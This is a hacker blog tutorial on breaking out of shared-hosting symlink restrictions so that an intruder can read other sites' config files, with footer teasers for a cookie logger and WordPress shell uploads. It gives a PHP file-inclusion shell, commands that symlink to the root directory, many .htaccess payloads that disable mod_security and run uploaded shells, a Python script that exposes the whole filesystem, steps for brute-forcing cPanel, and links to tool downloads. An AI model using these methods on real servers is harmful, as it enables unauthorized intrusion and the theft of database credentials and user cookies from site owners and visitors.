Skip to main content

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

By
Hi, Guys, 

Please a wonderfull tutorial provided bt Sem;\

 Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods.

So let's Get Started :)

Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers.

For This First You Need the Following Files :

1 -> Sen Haxor CGI Shell

2 -> sen.zip

3 -> passwd-bypass.php

4 -> Turbo Brute force Cpanel

5 - > Port.py

First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server .

Use the Following Code :

Make a php.ini with the following code

safe_mode=Off

And ini.php with

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["file"]);

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["ss"]);

?>

I will post the Download link of the files i use on the end of the tutorial .

So after creating php.ini and ini.php upload the other files to the server .

BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS

Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat

Commonly all of the above have root path like

/root/var/www/vhost/

where all sites will be under vhost directory  . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files

Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root .

Command : unzip sen.zip

Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root

Then You will see this

$ unzip sen.zip

Archive:  sen.zip

    linking: sen.txt                 -> /

finishing deferred symbolic links:

  sen.txt                -> /

This means a symbolic link has been created to / root .



http://foto.pk/images/2rkr.jpg



Now we need to upload .htaccess use the following

Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .



http://foto.pk/images/3twt.jpg



BYPASSING SYMLINK ON APACHE AND LITESPEED

Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error

These can be Bypass By Using Different .htaccess individually.

BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .

First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial

After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755

Then Open the Cgi Shell Login ( Password : senhaxor)

Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success .

Method 1 : .shtml method

This is the commonly used method by most of the hackers to bypass 403 forbidden Error .

So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located .

2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.

I will also add it to the Downloads.

Upload the /etc/passwd bypasser shell and get all /etc/passwd

Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target

Step 1 : ln -s / root

Step 2 : ln -s /home/username/public_html/config.php 1.shtml

Example if our site is www.site.com and username is site and its Wordpress

ln -s /home/site/public_html/wp-config.php 1.shtml

So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code :

Options +FollowSymlinks

DirectoryIndex itti.html

RemoveHandler .php

AddType application/octet-stream .php

Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config .

This is the common way of Bypass 403 forbidden and Litespeed .

Now Let Me Explain You the Advanced Method =)

Method 2 : Bypassing Symlinked Config From Cpanel

For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel .

First Run This Command : ls /var/mail

Then you will be displayed with all username from the server Copy all .

Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).

Open the Script and in User Paste all the username we got .

And for Password here is the wordlist :



http://pastebin.com/4kAjMvdy



Copy All and Paste it on Password Select Simple and Click Submit

If You're lucky you will be displayed with cracked cpanels.

Once you got a cpanel on the server You can Bypass 500 Internal Server Error 403 Forbidden Error From Port: 2077 and From error-pages from file manager.

Just symlink the config

ln -s /home/user/public_html/wp-config.php config.shtml

Login to the Cpanel

Then Go to File Manager -> Error Pages

Then choose any of these according to what error is triggered when you open your symlinked config

  400 (Bad request)

    401 (Authorization required)

    403 (Forbidden)

    404 (Not found)

    500 (Internal server error)

Example "&file=400.shtml&desc=(Bad request)

we can get the config by

"&file=config.shtml& desc=(Bad request)

BYPASS SYMLINK FROM PORT 2077

So once you Symlinked the Config You can just log in to port 2077

Then public_html/path/config.shtml

You will be able to download the config.shtml and you can view the source.

Method 3: Symlink Bypass via Open Port using Python

For this  First we Python to be Installed on Server.

To check if Python is installed run this command python -h

If its install we can use the following python script and Bypass

#!/usr/bin/env python

# devilzc0de.org (c) 2012

import SimpleHTTPServer

import SocketServer

import os

port = 13123

if __name__=='__main__':

os.chdir('/')

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", port), Handler)

print("Now open this server on webbrowser at port : " + str(port))

print("example: http://site.com :" + str(port))

httpd.serve_forever()

I have added the script to download. 

Now Upload the script to the shell



http://foto.pk/images/205cjg3.jpg



now run this command: python port.py



http://foto.pk/images/2je1wqq.jpg



Now Open the site with port 13123

www.site.com:13123



http://foto.pk/images/j5ifwm.jpg

Server Bypassed From Open Port.

Method 4 : Bypassing Symlink Using .ini Method

Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension.

ln -s /home/user/public_html/wp-config.php config.ini

now go to the shell and make a new file a.shtml

Paste the following code inside it and save it

<!--#include virtual="config.ini"-->

and save it.

Now open the a.shtml in the browser and right-click and view the source. Done Bypassed

Method 5: Bypassing Symlink Using ReadMe file

Make a new directory in your shell From the Cgi shell normally symlink the config

ln -s /home/user/public_html/config.php config.txt

now make .htaccess with the following code.

.htaccess

Options All

ReadMeName config.txt

Now when you open the directory on the browser you will be displayed with the config source directly.

eg: site.com/sen/config.txt is your symlinked config then when you open

www.site.com/sen/ you symlinked config will be displayed as a ReadMe content.

 That's it I have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess

1 - > .htaccess

Options Indexes FollowSymLinks

DirectoryIndex ssssss.htm

AddType txt .php

AddHandler txt .php

2 -> .htaccess

Options All

DirectoryIndex ssss.html

addType txt .php

AddHandler txt .php

<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule>

3 -> .htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

4 -> .htaccess

Options +FollowSymLinks

DirectoryIndex Sux.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

5 -> .htaccess

Options Indexes FollowSymLinks

DirectoryIndex ssssss.htm

AddType txt .php

AddHandler txt .php

<IfModule mod_autoindex.c>

IndexOptions

FancyIndexing

IconsAreLinks

SuppressHTMLPreamble

</ ifModule>

<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule>



.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType
application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py
This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
This one is to enable Symlink if the function is disabled in the server :

.htaccess

<Directory "/home"> *** Options -ExecCGI* ***

AllowOverride

AuthConfig Indexes

Limit FileInfo

Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks

</ Directory>

This one is to retrieve users permissions :
.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html
Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Change php version:
.htaccess
AddType application/x-httpd-php4 .php
Bypass Uploads Options and upload shell in another extension :
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :
www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar
So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me :
www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla -  Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking Decoder - Rafay Bolach  -Mike Wals - Team Indishell and all Indian Hackers


Regards
Sen HaXoR - Team Indishell


Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more